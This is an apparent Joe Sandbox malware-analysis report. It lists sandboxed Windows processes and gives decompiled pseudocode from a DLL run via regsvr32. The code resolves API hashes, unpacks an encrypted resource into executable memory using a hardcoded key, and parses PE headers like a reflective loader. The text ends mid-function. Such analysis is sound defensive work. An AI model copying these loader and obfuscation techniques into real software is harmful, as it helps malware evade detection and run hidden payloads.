MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 5000, Parent PID: 568

General

Target ID:	20
Start time:	01:05:57
Start date:	20/07/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff73c930000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 2932, Parent PID: 568

General

Target ID:	22
Start time:	01:06:07
Start date:	20/07/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff73c930000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 4432, Parent PID: 568

General

Target ID:	28
Start time:	01:06:31
Start date:	20/07/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
Imagebase:	0x7ff73c930000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: MpCmdRun.exePID: 5568, Parent PID: 6248

General

Target ID:	30
Start time:	01:06:37
Start date:	20/07/2022
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Imagebase:	0x7ff7b0320000
File size:	455656 bytes
MD5 hash:	A267555174BFA53844371226F482B86B
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5648, Parent PID: 5568

General

Target ID:	31
Start time:	01:06:38
Start date:	20/07/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c9170000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: regsvr32.exePID: 6400, Parent PID: 6380COMMON

Execution Graph

Execution Coverage:	3.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	7.9%
Total number of Nodes:	416
Total number of Limit Nodes:	16

Executed Functions

Function 10006120 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 301
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 41%

			E10006120(void* __ebx, void* __edi, void* __esi, void* __ebp, struct HINSTANCE__* _a4, signed int _a8) {
				void* _v4;
				void* _t36;
				void* _t39;
				void* _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				struct HRSRC__* _t65;
				signed int _t68;
				signed int _t69;
				void* _t77;
				void* _t79;
				intOrPtr _t83;
				signed int _t85;
				signed int _t96;
				void* _t97;
				signed int _t99;
				signed int _t100;
				signed int _t110;
				signed int _t112;
				signed int _t113;
				long _t117;
				signed int _t119;
				void* _t121;
				struct HRSRC__* _t123;
				int _t124;
				void* _t127;
				struct HINSTANCE__* _t128;
				signed int _t129;
				void* _t133;
				signed int _t138;
				signed int _t149;
				signed int _t152;
				signed int _t157;
				intOrPtr _t182;

				if(_a8 != 1) {
					L6:
					return 1;
				} else {
					_t36 = E10005040(__edi);
					_t181 = _t36;
					if(_t36 != 0) {
						_push(0x1003ce28);
						E10011135(__ebx, __edi, __esi, __eflags);
						__eflags = 0;
						return 0;
					} else {
						_push(__ebx);
						_push(__ebp);
						_push(__esi);
						_push(__edi);
						_push(L"kernel32.dll");
						_push(0x3801a8f2);
						_push(0x1a322e2e);
						_push(0x628ad09);
						_push(0x31c6c0a1);
						_push(0x28b4cee6);
						 *0x1004b0d8 = 0;
						 *0x1004b0dc = 0;
						 *0x1004b0e0 = 0;
						 *0x1004b0e8 = 0;
						 *0x1004b0e4 = 0;
						 *0x1004b0ec = 0;
						 *0x1004b0f0 = 0;
						_t39 = E10001E60(_t181);
						_push(L"ntdll.dll");
						_push(0x1c9cdc39);
						_push(0x2d34cc91);
						_push(0x118db97f);
						_push(0x348b2998);
						_push(0x3446e98c);
						_t127 = _t39;
						_t40 = E10001E60(_t181);
						_push(L"msvcrt.dll");
						_push(0xe094f82);
						_push(0x20e23fe3);
						_push(0x156af904);
						_push(0x108d4cdc);
						_push(0x106d66fc);
						_t121 = E10001E60(_t181);
						_push(0x3ee42795);
						_push(_t121);
						_t42 = E10001FF0();
						_push(0x402c2791);
						_push(_t121);
						 *0x1004d3f0 = _t42;
						_t43 = E10001FF0();
						_push(0xb29018f0);
						_push(_t121);
						 *0x1004d3ec = _t43;
						_t44 = E10001FF0();
						_push(0xccfd283f);
						_push(_t121);
						 *0x1004d3e0 = _t44;
						_t45 = E10001FF0();
						_push(0x298c691d);
						_push(_t121);
						 *0x1004d3d0 = _t45;
						_t46 = E10001FF0();
						_push(0x40ec656b);
						_push(_t121);
						 *0x1004d3e4 = _t46;
						_t47 = E10001FF0();
						_push(0x40946966);
						_push(_t121);
						 *0x1004d3fc = _t47;
						_t48 = E10001FF0();
						_push(0x5496c247);
						_push(_t127);
						 *0x1004d3a8 = _t48;
						_t49 = E10001FF0();
						_push(0x3b465a8a);
						_push(_t127);
						 *0x1004d3ac = _t49;
						_t50 = E10001FF0();
						_push(0x66afc09d);
						_push(_t127);
						 *0x1004d3b8 = _t50;
						_t51 = E10001FF0();
						_push(0x5eb2ba6);
						_push(_t127);
						 *0x1004d3d4 = _t51;
						_t52 = E10001FF0();
						_push(0x3c6bbc0e);
						_push(_t127);
						 *0x1004d3cc = _t52;
						_t53 = E10001FF0();
						_push(0x3f32f2a5);
						_push(_t127);
						 *0x1004d3c8 = _t53;
						_t54 = E10001FF0();
						_push(0x112ecd9a);
						_push(_t127);
						 *0x1004d3d8 = _t54;
						_t55 = E10001FF0();
						_push(0xcfb09550);
						_push(_t127);
						 *0x1004d400 = _t55;
						_t56 = E10001FF0();
						_push(0x30fe1b19);
						_push(_t40);
						 *0x1004d3bc = _t56;
						_t57 = E10001FF0();
						_push(0x33a92211);
						_push(_t127);
						 *0x1004d3b4 = _t57;
						_t58 = E10001FF0();
						_push(0xaab3e2a9);
						_push(_t127);
						 *0x1004d3f8 = _t58;
						_t59 = E10001FF0();
						_push(0x31e84135);
						_push(_t127);
						 *0x1004d3f4 = _t59;
						_t60 = E10001FF0();
						_push(0xaef34aa1);
						_push(_t127);
						 *0x1004d3dc = _t60;
						_t61 = E10001FF0();
						_push(0x1e75927d);
						_push(_t127);
						 *0x1004d3b0 = _t61;
						_t62 = E10001FF0();
						_push(0x56331b6e);
						_push(_t127);
						 *0x1004d3e8 = _t62;
						_t63 = E10001FF0();
						_push(0x1cf8ffb);
						_push(_t127);
						 *0x1004d3c4 = _t63;
						_t64 = E10001FF0();
						_t128 = _a4;
						 *0x1004d3c0 = _t64; // executed
						_t65 = FindResourceW(_t128, 0x5f4c, 0x1003ce4c); // executed
						_t123 = _t65;
						_v4 = LoadResource(_t128, _t123);
						_t124 = SizeofResource(_t128, _t123);
						_t182 =  *0x1004d3b8; // 0x761b66e0
						if(_t182 == 0) {
							_t96 =  *0x1004b0e8; // 0x0
							_t113 =  *0x1004b0e0; // 0x0
							_t68 =  *0x1004b0d8; // 0x0
							_t129 =  *0x1004b0dc; // 0x0
							_t149 =  *0x1004b0ec; // 0x0
							_t69 =  *0x1004b0e4; // 0x0
							_t15 = _t113 * 2; // 0x3
							_t152 = _t149 * _t68 + ((_t96 * _t113 + _t68) * 0x3fffffff + _t129) * _t96 + _t113 + _t129;
							_a8 = _t152;
							_t110 = (_t129 + _t15 + 3) * _t69 << 2;
							_t20 = _t96 + 2; // 0x2
							_t157 =  *0x1004b0d8; // 0x0
							_t117 = _t69 - _t20 * _t129 - _t113 * _t157 + (_t69 - _t20 * _t129 - _t113 * _t157) * 0x00000002 + (_t69 * _t96 * _t157 + _t69 * _t96 * _t157 * 0x00000002 - 0x00000003) *  *0x1004b0ec + 0x00002000 | 0x00001000 + _a8 * 0x00000004 - _t110;
							__eflags = _t117;
							_t77 = VirtualAlloc(0, _t124, _t117, 0x40 + _t152 * 4 - _t110);
						} else {
							_t112 =  *0x1004b0e8; // 0x0
							_t119 =  *0x1004b0dc; // 0x0
							_t85 =  *0x1004b0ec; // 0x0
							_t99 =  *0x1004b0d8; // 0x0
							_t4 = _t99 + 0x3fffffff; // 0x3fffffff
							_t138 =  *0x1004b0e0; // 0x0
							_t8 = _t138 * 2; // 0x3
							_t100 =  *0x1004b0e0; // 0x0
							_t77 =  *0x1004d3b8(0xffffffff, 0, _t124, 0x00001000 + (_t85 * _t99 + ((_t112 * _t138 + _t99) * 0x3fffffff + _t119) * _t112 - (_t119 + _t8 + 0x00000003) *  *0x1004b0e4 + _t100 + _t119) * 0x00000004 | _t85 *  *0x1004b0e4 * _t112 * _t112 * _t112 * _t112 * _t112 + _t119 + _t85 *  *0x1004b0e4 * _t112 * _t112 * _t112 * _t112 * _t112 + _t119 + 0x00002000, 0x40 + (_t112 * 0x3fffffff + _t4 * _t119 + _t85 + _t138) * 4, 0); // executed
						}
						_t133 = _t77;
						memcpy(_t133, _v4, _t124);
						_t79 = malloc(0x9d1);
						_t97 = _t79;
						E10002340();
						E100027D0();
						 *0x1004d3e0(_t97, 0x39fc4527, 0xfc9810f7, 0x2aab42ff, _t97, _t133, _t124, 0xed9e0cf, 0x96c3a441, 0x245e78a3, _t97, "8nGA7ohfFpugG(l$!#2u__*t5EaFD77", 0x20);
						_t83 = E10005260();
						 *0x1004d408 = _t83;
						 *0x1004d404(_a4, 1, 0, _t133, _t124, E100045D0, E100045F0, E10004610, E10004650, E10004670, 0);
						goto L6;
					}
				}
			}

0x10006126
0x10006566
0x1000656c
0x1000612c
0x1000612c
0x10006131
0x10006133
0x1000656f
0x10006574
0x1000657c
0x1000657f
0x10006139
0x10006139
0x1000613a
0x1000613b
0x1000613c
0x1000613d
0x10006142
0x10006147
0x1000614e
0x10006153
0x10006158
0x1000615d
0x10006163
0x10006169
0x1000616f
0x10006175
0x1000617b
0x10006181
0x10006187
0x1000618c
0x10006191
0x10006196
0x1000619b
0x100061a0
0x100061a5
0x100061aa
0x100061ac
0x100061b1
0x100061b6
0x100061bb
0x100061c0
0x100061c5
0x100061ca
0x100061d9
0x100061db
0x100061e0
0x100061e1
0x100061e6
0x100061eb
0x100061ec
0x100061f1
0x100061f6
0x100061fb
0x100061fc
0x10006201
0x10006206
0x1000620b
0x1000620c
0x10006211
0x10006216
0x1000621b
0x1000621c
0x10006221
0x10006226
0x1000622b
0x1000622c
0x10006231
0x10006236
0x1000623b
0x1000623c
0x10006241
0x10006246
0x1000624b
0x1000624c
0x10006251
0x10006259
0x1000625e
0x1000625f
0x10006264
0x10006269
0x1000626e
0x1000626f
0x10006274
0x10006279
0x1000627e
0x1000627f
0x10006284
0x10006289
0x1000628e
0x1000628f
0x10006294
0x10006299
0x1000629e
0x1000629f
0x100062a4
0x100062a9
0x100062ae
0x100062af
0x100062b4
0x100062b9
0x100062be
0x100062bf
0x100062c4
0x100062c9
0x100062ce
0x100062cf
0x100062d4
0x100062dc
0x100062e1
0x100062e2
0x100062e7
0x100062ec
0x100062f1
0x100062f2
0x100062f7
0x100062fc
0x10006301
0x10006302
0x10006307
0x1000630c
0x10006311
0x10006312
0x10006317
0x1000631c
0x10006321
0x10006322
0x10006327
0x1000632e
0x10006333
0x10006334
0x1000633a
0x1000633f
0x10006344
0x10006345
0x1000634a
0x1000634f
0x10006361
0x10006366
0x10006368
0x10006374
0x1000637e
0x10006380
0x10006386
0x10006432
0x10006438
0x1000643e
0x10006443
0x10006449
0x10006459
0x1000646d
0x10006474
0x10006476
0x10006481
0x10006487
0x10006494
0x100064c4
0x100064c4
0x100064ca
0x1000638c
0x1000638c
0x10006392
0x10006398
0x1000639e
0x100063a4
0x100063b9
0x100063d6
0x100063fa
0x10006427
0x10006427
0x100064d5
0x100064d9
0x100064e4
0x100064f1
0x10006503
0x1000651a
0x10006523
0x10006546
0x10006557
0x1000655c
0x00000000
0x10006565
0x10006133

APIs

FindResourceW.KERNELBASE(?,00005F4C,1003CE4C), ref: 10006366
LoadResource.KERNEL32(?,00000000), ref: 1000636C
SizeofResource.KERNEL32(?,00000000), ref: 10006378
VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,00000000), ref: 10006427
VirtualAlloc.KERNEL32(00000000,00000000,?,00000000), ref: 100064CA
memcpy.MSVCRT ref: 100064D9
malloc.MSVCRT ref: 100064E4
??3@YAXPAX@Z.MSVCRT ref: 10006523

Strings

ntdll.dll, xrefs: 1000618C
8nGA7ohfFpugG(l$!#2u__*t5EaFD77, xrefs: 100064EC
kernel32.dll, xrefs: 1000613D
msvcrt.dll, xrefs: 100061B1

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$AllocVirtual$??3@FindLoadNumaSizeofmallocmemcpy
String ID: 8nGA7ohfFpugG(l$!#2u__*t5EaFD77$kernel32.dll$msvcrt.dll$ntdll.dll
API String ID: 3024364686-882265788
Opcode ID: 73f28b8c6d58252cdff927fcb48cb9a981f06cd2f682e57dd75e91a0e94e53b4
Instruction ID: 1699d20feb2015e992388abaa39e01a506b89f8495deb80be789641e5ebed42c
Opcode Fuzzy Hash: 73f28b8c6d58252cdff927fcb48cb9a981f06cd2f682e57dd75e91a0e94e53b4
Instruction Fuzzy Hash: ACA159719403256FF704EF748EC6E96769CEB46681B00453FF511E726AEBB0B5008B9D

Uniqueness

Uniqueness Score: -1.00%

Function 10005260 Relevance: 7.1, APIs: 4, Instructions: 1092
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E10005260() {
				signed int _t340;
				signed int _t351;
				signed int _t354;
				signed int _t356;
				signed int _t360;
				void* _t373;
				signed int _t385;
				signed int _t388;
				signed int _t398;
				signed int _t403;
				intOrPtr _t405;
				void* _t410;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t423;
				signed int _t425;
				void* _t433;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				void* _t441;
				signed int _t442;
				signed int _t444;
				signed int _t448;
				intOrPtr _t453;
				signed int _t454;
				signed int _t463;
				void* _t467;
				signed int _t468;
				signed int _t469;
				void* _t473;
				signed int _t474;
				void* _t475;
				void* _t476;
				intOrPtr _t478;
				signed int _t481;
				void* _t492;
				signed int _t498;
				signed int _t520;
				intOrPtr _t523;
				signed int _t532;
				signed int _t533;
				signed short* _t542;
				signed int _t545;
				signed int _t563;
				signed int _t571;
				signed int _t579;
				signed int _t580;
				signed int _t583;
				intOrPtr _t585;
				signed int _t587;
				signed int _t590;
				signed int _t604;
				signed int _t624;
				intOrPtr _t636;
				signed int _t637;
				signed int _t642;
				signed int _t665;
				signed int _t668;
				signed int _t673;
				signed int _t691;
				signed int _t692;
				signed int _t706;
				signed int _t707;
				signed int _t716;
				signed int _t717;
				signed int _t722;
				signed int _t726;
				signed int _t731;
				signed int _t732;
				signed int _t733;
				signed int _t736;
				signed int _t738;
				signed int _t739;
				signed int _t743;
				signed int _t752;
				signed int _t754;
				signed int _t756;
				signed int _t759;
				signed int _t761;
				signed int _t765;
				signed int _t766;
				signed int _t770;
				signed int _t778;
				signed int _t780;
				signed int _t789;
				signed int _t795;
				signed int _t836;
				signed int _t840;
				signed int _t841;
				signed int _t853;
				signed int _t867;
				signed int _t888;
				signed int _t890;
				signed int _t891;
				signed int _t895;
				signed int _t900;
				signed int _t903;
				signed int _t905;
				signed int _t907;
				signed int _t913;
				signed int _t918;
				signed int _t921;
				signed int _t924;
				signed int _t928;
				signed int _t930;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t941;
				intOrPtr* _t951;
				signed int _t954;
				signed int _t955;
				signed int _t956;
				signed int _t962;
				signed int _t963;
				signed int _t970;
				signed int _t971;
				signed int _t981;
				signed int _t988;
				signed int _t989;
				signed int _t995;
				signed int _t1035;
				signed int _t1041;
				signed int _t1042;
				signed int _t1043;
				signed short _t1049;
				signed int _t1050;
				signed int _t1051;
				signed int _t1064;
				intOrPtr* _t1066;
				signed int _t1067;
				signed int _t1075;
				signed int _t1076;
				signed int _t1084;
				signed int _t1085;
				signed int _t1086;
				signed int _t1091;
				signed int _t1094;
				signed int _t1097;
				signed int _t1126;
				signed int _t1128;
				signed int _t1132;
				signed int _t1135;
				signed int _t1138;
				signed int _t1153;
				signed int _t1165;
				signed int _t1166;
				signed int _t1167;
				intOrPtr* _t1168;
				signed int _t1169;
				signed int _t1170;
				signed int _t1174;
				signed int _t1184;
				signed int _t1187;
				signed int _t1200;
				void* _t1202;
				signed int _t1227;
				signed int _t1237;
				void* _t1248;
				void* _t1249;
				void* _t1250;
				void* _t1251;

				_t691 =  *0x1004b0ec; // 0x0
				_t340 =  *0x1004b0e4; // 0x0
				_t981 =  *0x1004b0e0; // 0x0
				_t932 =  *0x1004b0d8; // 0x0
				_t795 =  *0x1004b0dc; // 0x0
				_t933 =  *0x1004b0e8; // 0x0
				_t4 = _t981 * _t933 + 2; // 0x2
				_t5 = _t795 + 0x3fffffff; // 0x3fffffff
				_t6 = _t691 + 0x3fffffff; // 0x3fffffff
				_t934 =  *0x1004b0e0; // 0x0
				_t532 =  *0x1004b0d8; // 0x0
				 *(_t1248 + 0x14) = 0;
				if( *((intOrPtr*)(_t1248 + 0x60)) + ((_t691 * 0x3fffffff + _t6 * _t340 + _t933 << 1) - (_t934 * _t532 * _t795 + 1) * _t795 + _t532) * 2 < 0x40 + (_t5 * _t340 + (_t340 + _t4) * _t981 + _t933 + (_t981 * 0x3fffffff - (_t691 * _t932 + 1) * _t340 + _t795 + 2) * _t932 + _t691 + _t795) * 4) {
					L32:
					return 0;
				} else {
					_t988 =  *0x1004b0e0; // 0x0
					_t533 = _t532 * _t795;
					_t941 =  *0x1004b0e8; // 0x0
					_t989 = _t988 * _t691;
					 *(_t1248 + 0x10) = _t533;
					 *(_t1248 + 0x30) = _t989;
					_t542 =  *(_t1248 + 0x5c);
					if(( *_t542 & 0x0000ffff) != (_t533 - _t941 + _t941 * 2 - _t340 - _t691 << 1) - (_t691 + _t691 + (_t989 * _t691 + _t795) * _t795 * 2) *  *0x1004b0e0 + 0x5a4d) {
						goto L32;
					} else {
						_t995 = _t941 * _t691;
						 *(_t1248 + 0x20) = _t542[0x1e];
						 *(_t1248 + 0x2c) = _t995;
						_t545 =  *0x1004b0d8; // 0x0
						_t26 = (((_t995 +  *(_t1248 + 0x10)) * _t795 + _t941) * _t340 + _t941 * _t545) * 2; // 0x7
						_t1126 =  *0x1004b0e0; // 0x0
						_t36 = _t691 + 1; // 0x1
						if( *((intOrPtr*)(_t1248 + 0x60)) + (_t36 * _t340 + (((_t941 * _t941 * _t941 + _t795 * _t795) * 0x3fffffff + _t1126) * _t795 + 1) * _t941 +  *(_t1248 + 0x10) + _t691) * 4 <  *(_t1248 + 0x20) + (((_t995 +  *(_t1248 + 0x10)) * _t795 + _t941) * _t340 + _t941 * _t545 + _t26 + 7) *  *0x1004b0e0 + _t691 * 0x55555551 + _t545 + (_t691 * 0x55555551 + _t545) * 2 + (_t340 * 4 - 5) * _t795 + _t941 * 7 - _t340 + 0xf8) {
							goto L32;
						} else {
							_t1128 =  *0x1004b0e8; // 0x0
							_t951 = (_t795 - _t691 + 1) * _t795 + (_t795 - _t691 + 1) * _t795 * 4 - (_t691 + _t691 * 4 + 5) * _t1128 - _t691 + _t691 * 4 + ( *(_t1248 + 0x5c))[0x1e] +  *(_t1248 + 0x5c);
							_t47 = _t340 + 0x7fffffff; // 0x7fffffff
							 *(_t1248 + 0x18) = _t340 + _t340;
							_t52 = _t691 * 0x7ffffffb + _t47 * _t795 + _t1128 + (3 - _t795) *  *0x1004b0e0 + 0x4550; // 0x4550
							_t1132 =  *0x1004b0e8; // 0x0
							_t563 =  *0x1004b0d8; // 0x0
							 *((intOrPtr*)(_t1248 + 0x24)) = _t951;
							if( *_t951 != _t691 * 0x7ffffffb + _t47 * _t795 + _t1128 + (3 - _t795) *  *0x1004b0e0 + _t52 - ( *(_t1248 + 0x18) + 2 + _t1132 * 2) * _t563) {
								goto L32;
							} else {
								_t1135 =  *0x1004b0e0; // 0x0
								_t1138 =  *0x1004b0e0; // 0x0
								if(( *(_t951 + 4) & 0x0000ffff) != ((_t691 + _t563) *  *0x1004b0e8 - _t795 + 2) * _t795 - (_t1135 + 2) * _t340 -  *0x1004b0e8 - _t691 + _t1138 + 0x14c + (((_t691 + _t563) *  *0x1004b0e8 - _t795 + 2) * _t795 - (_t1135 + 2) * _t340 -  *0x1004b0e8 - _t691 + _t1138) * 2) {
									goto L32;
								} else {
									 *(_t1248 + 0x1c) =  *(_t951 + 0x38);
									_t1035 =  *0x1004b0e0; // 0x0
									 *(_t1248 + 0x20) = _t563 + _t563 * 2;
									if(( *(_t1248 + 0x1c) &  *(_t1248 + 0x20) + _t1035 * _t1035 * _t1035 * _t795 + _t691 + _t691 + 0x00000001 + ( *(_t1248 + 0x20) + _t1035 * _t1035 * _t1035 * _t795 + _t691 + _t691) * 0x00000002) != 0) {
										goto L32;
									} else {
										_t1041 =  *0x1004b0e0; // 0x0
										_t1042 =  *0x1004b0e8; // 0x0
										_t1043 =  *0x1004b0e8; // 0x0
										_t571 =  *0x1004b0d8; // 0x0
										_t1153 =  *0x1004b0e0; // 0x0
										 *(_t1248 + 0x20) = ((_t563 * _t563 + _t1041) * _t563 + (_t563 - _t340 - _t691) * _t795 + (2 - _t1042 -  *0x1004b0d8) * _t1043 + (_t571 + _t795) * 2 - _t340 + _t691) * 0x78 + _t951 + ( *(_t951 + 0x14) & 0x0000ffff) + 0x18;
										_t579 =  *(_t1248 + 0x18);
										_t83 = _t795 - 2; // -2
										_t1049 = (_t795 + _t83 - _t579) * _t340 + ((_t1153 * _t795 + 1) * _t691 + 0x7fffffff) * _t1043 * 2 + ( *(_t951 + 6) & 0x0000ffff) - _t691 + _t691;
										if(_t1049 == 0) {
											_t580 =  *0x1004b0d8; // 0x0
											_t1050 =  *0x1004b0e8; // 0x0
										} else {
											 *((intOrPtr*)(_t1248 + 0x28)) =  ~_t579 - _t691 * 4;
											 *(_t1248 + 0x10) =  *(_t1248 + 0x20) + 0xc;
											_t673 =  *0x1004b0d8; // 0x0
											 *(_t1248 + 0x20) = _t1049;
											_t1086 =  *0x1004b0e8; // 0x0
											do {
												_t1237 =  *( *(_t1248 + 0x10) + 4);
												 *(_t1248 + 0x18) = _t1237;
												if(_t1237 != 0) {
													_t951 =  *((intOrPtr*)(_t1248 + 0x24));
													_t1091 = (4 + _t340 * 4) * _t673 + (_t1086 * 8 - 0xc) * _t795 +  *(_t1248 + 0x18) + (_t691 + _t691 * 2 + (_t691 + _t1086 * 2 + _t673 + 1) *  *0x1004b0e0 + _t1086) * 4 +  *( *(_t1248 + 0x10));
												} else {
													_t97 = _t795 + 0x7ffffffe; // 0x7ffffffe
													_t1094 =  *0x1004b0e0; // 0x0
													_t1091 =  *(_t1248 + 0x1c) + (((_t340 + _t691) * _t1086 + _t691) * 0x7fffffff + _t97 * _t795 + _t1094 * 2) * 2 +  *( *(_t1248 + 0x10));
												}
												 *(_t1248 + 0x18) = _t1091;
												if(_t1091 <=  *((intOrPtr*)(_t1248 + 0x28)) +  *(_t1248 + 0x14)) {
													_t673 =  *0x1004b0d8; // 0x0
												} else {
													_t1097 =  *0x1004b0e0; // 0x0
													_t673 =  *0x1004b0d8; // 0x0
													 *(_t1248 + 0x14) =  *(_t1248 + 0x18) + ((_t340 + _t795) * 0x3fffffff + ((_t340 *  *0x1004b0d8 + 1) * 0x3fffffff + _t1097) *  *0x1004b0e8 + _t1097 + _t691 + _t673) * 4;
												}
												_t1086 =  *0x1004b0e8; // 0x0
												 *(_t1248 + 0x10) =  *(_t1248 + 0x10) + 0x28;
												_t129 = _t1248 + 0x20;
												 *_t129 =  *(_t1248 + 0x20) - 1;
											} while ( *_t129 != 0);
										}
										_t133 =  *(_t1248 + 0x2c) * _t580 + 2; // 0x2
										 *0x1004d3bc(_t1248 + 0x34 + ((_t340 - _t691 - 4) * _t795 - (_t340 + _t133) * _t1050 + ( *(_t1248 + 0x30) + _t580 + 2) *  *0x1004b0e0 - _t691) * 0x6c);
										_t351 =  *0x1004b0e4; // 0x0
										_t692 =  *0x1004b0ec; // 0x0
										_t1165 =  *0x1004b0e8; // 0x0
										_t1051 =  *0x1004b0dc; // 0x0
										_t583 =  *0x1004b0e0; // 0x0
										 *(_t1248 + 0x34) = E10002BF0((2 - _t351 * _t351) * _t583 - _t692 + _t692 - _t1165 + _t1051 +  *((intOrPtr*)(_t1248 + 0x38)), (1 - _t1165) * _t351 * _t1051 +  *((intOrPtr*)(_t951 + 0x50)));
										_t354 =  *0x1004b0d8; // 0x0
										_t142 = _t354 + 0x7ffffffe; // 0x7ffffffe
										_t143 = _t354 + 2; // 0x2
										_t356 =  *0x1004b0e4; // 0x0
										_t360 =  *0x1004b0ec; // 0x0
										_t146 = _t1051 + 0xa; // 0xa
										_t706 =  *0x1004b0d8; // 0x0
										 *(_t1248 + 0x1c) =  *(_t1248 + 0x34) + (_t356 * 0x7fffffff + _t142 * _t1165 + _t1051 + _t1051 + _t143 * _t583 << 1) - (_t1051 + _t146) * _t360;
										_t707 = _t706 * _t1051;
										 *(_t1248 + 0x14) = _t707;
										_t1166 =  *0x1004b0ec; // 0x0
										 *(_t1248 + 0x34) = (_t707 * 0xfffffffd - (_t1165 * _t1165 + 3 + _t1165 * _t1165 * 2) * _t583 + 3) * _t583;
										_t1167 =  *0x1004b0d8; // 0x0
										_t373 = E10002BF0( *((intOrPtr*)(_t1248 + 0x3c)) + _t360, ( *(_t1248 + 0x14) + 1) * _t1051 - _t1165 + _t1166 + _t1166 + _t1167 + (( *(_t1248 + 0x14) + 1) * _t1051 - _t1165 + _t1166 + _t1166 + _t1167) * 2 +  *(_t1248 + 0x34) +  *(_t1248 + 0x18));
										_t1249 = _t1248 + 8;
										if( *(_t1248 + 0x20) != _t373) {
											goto L32;
										} else {
											_t716 =  *0x1004b0ec; // 0x0
											 *(_t1249 + 0x20) = _t716 * _t1167;
											_t165 = _t1051 + 2; // 0x3
											_t717 =  *0x1004b0e8; // 0x0
											_t166 = _t1167 + 1; // 0x1
											_t385 =  *0x1004b0e4; // 0x0
											_t388 =  *0x1004b0ec; // 0x0
											_t398 =  *0x1004b0e4; // 0x0
											_t403 =  *0x1004b0ec; // 0x0
											_t722 =  *0x1004b0e8; // 0x0
											_t182 = _t403 + 1; // 0x1
											_t1168 =  *((intOrPtr*)(_t1249 + 0x74));
											_t405 =  *_t1168((( ~_t1051 << 1) - ( *((intOrPtr*)(_t1249 + 0x30)) + 2) *  *0x1004b0e4 + _t583 << 2) - (_t403 + _t403 + _t403 * 2 + _t182 * _t722 * _t722 * 4) * _t1167 +  *((intOrPtr*)(_t951 + 0x34)),  *(_t1249 + 0x20), ((_t388 * _t388 * _t1167 + _t388 * _t388 * _t1167 * 0x00000002 - _t1051 + _t1051 * 0x00000002) * _t583 - _t1051 + _t1051 * 0x00000002) * _t1051 + (_t583 * _t1167 + _t583 * _t1167 * 0x00000002 - 0x00000003) * _t717 -  *(_t1249 + 0x28) +  *(_t1249 + 0x28) * 0x00000002 + 0x00001000 | (_t398 + 0x7fffffff) * _t1051 + _t583 * 0x7fffffff + (_t398 + 0x7fffffff) * _t1051 + _t583 * 0x7fffffff + 0x00002000, ((1 - _t583) * _t1167 + _t165) * _t716 + (_t583 *  *0x1004b0e4 + 3) * _t717 + _t166 * _t583 + _t385 * _t1167 * 0x7fffffff + ((1 - _t583) * _t1167 + _t165) * _t716 + (_t583 *  *0x1004b0e4 + 3) * _t717 + _t166 * _t583 + _t385 * _t1167 * 0x7fffffff + 4,  *((intOrPtr*)(_t1249 + 0x78)));
											_t1250 = _t1249 + 0x14;
